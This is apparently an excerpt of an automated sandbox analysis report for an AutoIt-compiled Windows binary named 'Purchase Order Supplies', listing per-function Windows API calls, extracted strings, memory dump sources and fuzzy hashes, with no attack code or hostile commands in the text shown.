                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00CAAF8E
                            • Part of subcall function 00CAB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00CAB85B), ref: 00CAB926
                            • Part of subcall function 00CAB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00CAB85B,00000000,?,?,00CAAF1E,?,?), ref: 00CAB9BD
                          • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00CAAF1E,?,?), ref: 00CAB864
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                          • String ID:
                          • API String ID: 2797419724-0
                          • Opcode ID: 369dd26dc2b9ffe6371062f00db295c1bdd16d66b547bc32ebdd99f633b4085f
                          • Instruction ID: a7e6715021b9819f924586b9693d8245bfac28b3bca934b0222e9082b09ef9e5
                          • Opcode Fuzzy Hash: 369dd26dc2b9ffe6371062f00db295c1bdd16d66b547bc32ebdd99f633b4085f
                          • Instruction Fuzzy Hash: D2D0127118430D77DF102BA5DC07F893E1EAB02755F408421FA05692E2CB716811A565
                          Function 00CB8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00CB8E1F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 1be4398e09e6f548200deff44456f7c1901bee5c3ddb024118f555ae9b8f0c38
                          • Instruction ID: 0278d4a422a344ec08c6e1e538421a9aac50737ba13cbabcefab6f740699aec2
                          • Opcode Fuzzy Hash: 1be4398e09e6f548200deff44456f7c1901bee5c3ddb024118f555ae9b8f0c38
                          • Instruction Fuzzy Hash: BAA0123000060CB78A001B51EC044847F5DD6041507008010F41C40121CB3354114591
                          Function 00CBA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00CB6AE9,00D467D8,00000014), ref: 00CBA937
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 166f29710806c40949f6fd19aecdc7cf4d23787e5dd4332a4667d4bd3832ad9c
                          • Instruction ID: 1e2f703b96ea465b048e91cc828a9d2f49f0fb414d0ffcb39de3a80e2c7a94f9
                          • Opcode Fuzzy Hash: 166f29710806c40949f6fd19aecdc7cf4d23787e5dd4332a4667d4bd3832ad9c
                          • Instruction Fuzzy Hash: 8DB012F07033025BD7084B38AC5419E3DD95749202305803D7803C2760DF308450DF10
                          Function 00CB0EC4 Relevance: .3, Instructions: 345COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction ID: e710c2e2087d863d3e341516f16ea38c869c60860ac5f2c6b0379adc18c130e8
                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction Fuzzy Hash: E6C1C57220529349DF2D463EC4344BFFBA16AA27B272E076DD8B3CB4C4EE24D665D610
                          Function 00CB12F9 Relevance: .3, Instructions: 341COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction ID: d8975dadce2e6f65032ee6919b0e0bc83967bc3577ca4e0a8a5eb96f83ee4d2e
                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction Fuzzy Hash: 55C1EA722052934ADF2D463AC4344BFBBA15AA27B271E076DD8B3CB4D4FE24D725D620
                          Function 00CB0A8F Relevance: .3, Instructions: 331COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                          • Instruction ID: 2ef8f4587f85c82264c29b11634495db132c450c5ca7eddf910e893716628f60
                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                          • Instruction Fuzzy Hash: 19C1C7722052934ADF2D463AC4344BFFBA16AA17B672A4B6DD4F3CB4C4FE24D624D610
                          Function 00CB0677 Relevance: .3, Instructions: 323COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction ID: e290db56163e25378687700dede30628fdcce002744f4e623bda39a6c44eb938
                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction Fuzzy Hash: 40C1F87220529349DF2D463AC4344BFFBA16EA27B272A476DD4B3CB4C1EE24D725D620
                          Function 00CEA750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00CEA7A5
                          • DeleteObject.GDI32(00000000), ref: 00CEA7B7
                          • DestroyWindow.USER32 ref: 00CEA7C5
                          • GetDesktopWindow.USER32 ref: 00CEA7DF
                          • GetWindowRect.USER32(00000000), ref: 00CEA7E6
                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CEA927
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CEA937
                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA97F
                          • GetClientRect.USER32(00000000,?), ref: 00CEA98B
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CEA9C5
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA9E7
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEA9FA
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEAA05
                          • GlobalLock.KERNEL32(00000000), ref: 00CEAA0E
                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEAA1D
                          • GlobalUnlock.KERNEL32(00000000), ref: 00CEAA26
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEAA2D
                          • GlobalFree.KERNEL32(00000000), ref: 00CEAA38
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00CEAA4A
                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00D1D9BC,00000000), ref: 00CEAA60
                          • GlobalFree.KERNEL32(00000000), ref: 00CEAA70
                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CEAA96
                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CEAAB5
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEAAD7
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CEACC4
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2211948467-2373415609
                          • Opcode ID: 5645aba7e101ab8fa32097cf83246b34b79fdc9af7bf8cd9854f86336914c760
                          • Instruction ID: 927323d53fa989f2e32c29282846c165a53da61fb6f0fa95d773a2454fd36fd9
                          • Opcode Fuzzy Hash: 5645aba7e101ab8fa32097cf83246b34b79fdc9af7bf8cd9854f86336914c760
                          • Instruction Fuzzy Hash: 4C026E75900259BFDB14DF69CC89EAE7BB9FB48310F108159F915EB2A0DB34AD42CB60
                          Function 00CFD095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                          Download Yara Rule
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 00CFD0EB
                          • GetSysColorBrush.USER32(0000000F), ref: 00CFD11C
                          • GetSysColor.USER32(0000000F), ref: 00CFD128
                          • SetBkColor.GDI32(?,000000FF), ref: 00CFD142
                          • SelectObject.GDI32(?,00000000), ref: 00CFD151
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD17C
                          • GetSysColor.USER32(00000010), ref: 00CFD184
                          • CreateSolidBrush.GDI32(00000000), ref: 00CFD18B
                          • FrameRect.USER32(?,?,00000000), ref: 00CFD19A
                          • DeleteObject.GDI32(00000000), ref: 00CFD1A1
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00CFD1EC
                          • FillRect.USER32(?,?,00000000), ref: 00CFD21E
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CFD249
                            • Part of subcall function 00CFD385: GetSysColor.USER32(00000012), ref: 00CFD3BE
                            • Part of subcall function 00CFD385: SetTextColor.GDI32(?,?), ref: 00CFD3C2
                            • Part of subcall function 00CFD385: GetSysColorBrush.USER32(0000000F), ref: 00CFD3D8
                            • Part of subcall function 00CFD385: GetSysColor.USER32(0000000F), ref: 00CFD3E3
                            • Part of subcall function 00CFD385: GetSysColor.USER32(00000011), ref: 00CFD400
                            • Part of subcall function 00CFD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFD40E
                            • Part of subcall function 00CFD385: SelectObject.GDI32(?,00000000), ref: 00CFD41F
                            • Part of subcall function 00CFD385: SetBkColor.GDI32(?,00000000), ref: 00CFD428
                            • Part of subcall function 00CFD385: SelectObject.GDI32(?,?), ref: 00CFD435
                            • Part of subcall function 00CFD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00CFD454
                            • Part of subcall function 00CFD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFD46B
                            • Part of subcall function 00CFD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00CFD480
                            • Part of subcall function 00CFD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CFD4A8
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                          • String ID:
                          • API String ID: 3521893082-0
                          • Opcode ID: 6eb33cbd97cc3df6ca9fa08a499e0b78347c654d79660f9c58a8dc46e06a9bda
                          • Instruction ID: 5c5f51373a0da00809f8741200beb815542115cdf70a3b13578d67af07be68a9
                          • Opcode Fuzzy Hash: 6eb33cbd97cc3df6ca9fa08a499e0b78347c654d79660f9c58a8dc46e06a9bda
                          • Instruction Fuzzy Hash: BB918171008305BFD7509F64DC08EAB7BAAFF85321F108A19F662D62E0DB75D945CB62
                          Function 00CEA3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 00CEA42A
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CEA4E9
                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CEA527
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CEA539
                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CEA57F
                          • GetClientRect.USER32(00000000,?), ref: 00CEA58B
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CEA5CF
                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CEA5DE
                          • GetStockObject.GDI32(00000011), ref: 00CEA5EE
                          • SelectObject.GDI32(00000000,00000000), ref: 00CEA5F2
                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CEA602
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CEA60B
                          • DeleteDC.GDI32(00000000), ref: 00CEA614
                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CEA642
                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CEA659
                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CEA694
                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CEA6A8
                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CEA6B9
                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CEA6E9
                          • GetStockObject.GDI32(00000011), ref: 00CEA6F4
                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CEA6FF
                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CEA709
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                          • API String ID: 2910397461-517079104
                          • Opcode ID: 6488d1704be26dc94769ed2980ee608a6485c33a89ece68f28196dc9097930b4
                          • Instruction ID: 058292ff085a70a84297bc7ebefc29c65b58f523fe26aac1356cecc91fc71056
                          • Opcode Fuzzy Hash: 6488d1704be26dc94769ed2980ee608a6485c33a89ece68f28196dc9097930b4
                          • Instruction Fuzzy Hash: 70A14D75A40315BFEB14DBA9DC49FAA7BB9EB04711F008114FA15EB2E0DB74AD41CB60
                          Function 00CDE44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00CDE45E
                          • GetDriveTypeW.KERNEL32(?,00D2DC88,?,\\.\,00D2DBF0), ref: 00CDE54B
                          • SetErrorMode.KERNEL32(00000000,00D2DC88,?,\\.\,00D2DBF0), ref: 00CDE6B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: 2a5964e782179d6894a2a6b6c38bd21cc483986065ddee326b50917bbdbb928c
                          • Instruction ID: 61a1fcbff7acf4cd9679790358eb8fea4dc75186a16f609326c2cbe333a48857
                          • Opcode Fuzzy Hash: 2a5964e782179d6894a2a6b6c38bd21cc483986065ddee326b50917bbdbb928c
                          • Instruction Fuzzy Hash: 8451A730204305AFC600FF19C8D1929F7A1AB64744B618A1BF656AF3D1EB70DF4AEB52
                          Function 00C9C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 1038674560-86951937
                          • Opcode ID: 08f92b0e236f49b366730c720292bfd4644aae94558188f5cba966e20740fb62
                          • Instruction ID: 4527b623c0076a06671080c53cb2e2c0a366ef70f8fe375159c1b4453f1dd5ed
                          • Opcode Fuzzy Hash: 08f92b0e236f49b366730c720292bfd4644aae94558188f5cba966e20740fb62
                          • Instruction Fuzzy Hash: 32616B316403127BDF21EA649CC6FFA335CAF25344F140025FC56AA5C6EBA0DB15EAB1
                          Function 00C948C8 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 491windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32 ref: 00C94956
                          • DeleteObject.GDI32(00000000), ref: 00C94998
                          • DeleteObject.GDI32(00000000), ref: 00C949A3
                          • DestroyCursor.USER32(00000000), ref: 00C949AE
                          • DestroyWindow.USER32(00000000), ref: 00C949B9
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D0E179
                          • 6FB00200.COMCTL32(?,000000FF,?), ref: 00D0E1B2
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00D0E5E0
                            • Part of subcall function 00C949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C94954,00000000), ref: 00C94A23
                          • SendMessageW.USER32 ref: 00D0E627
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D0E63E
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: DestroyMessageSendWindow$DeleteObject$B00200CursorInvalidateMoveRect
                          • String ID: 0
                          • API String ID: 3209014489-4108050209
                          • Opcode ID: 31dd7af950d951f011b29f6a24af4b71a59ff08547a6b9c31fa7a579f6d4e79c
                          • Instruction ID: 68b13c0c7d4833997bc531a47942ed8045e6e2469400da99915d658ddc18a213
                          • Opcode Fuzzy Hash: 31dd7af950d951f011b29f6a24af4b71a59ff08547a6b9c31fa7a579f6d4e79c
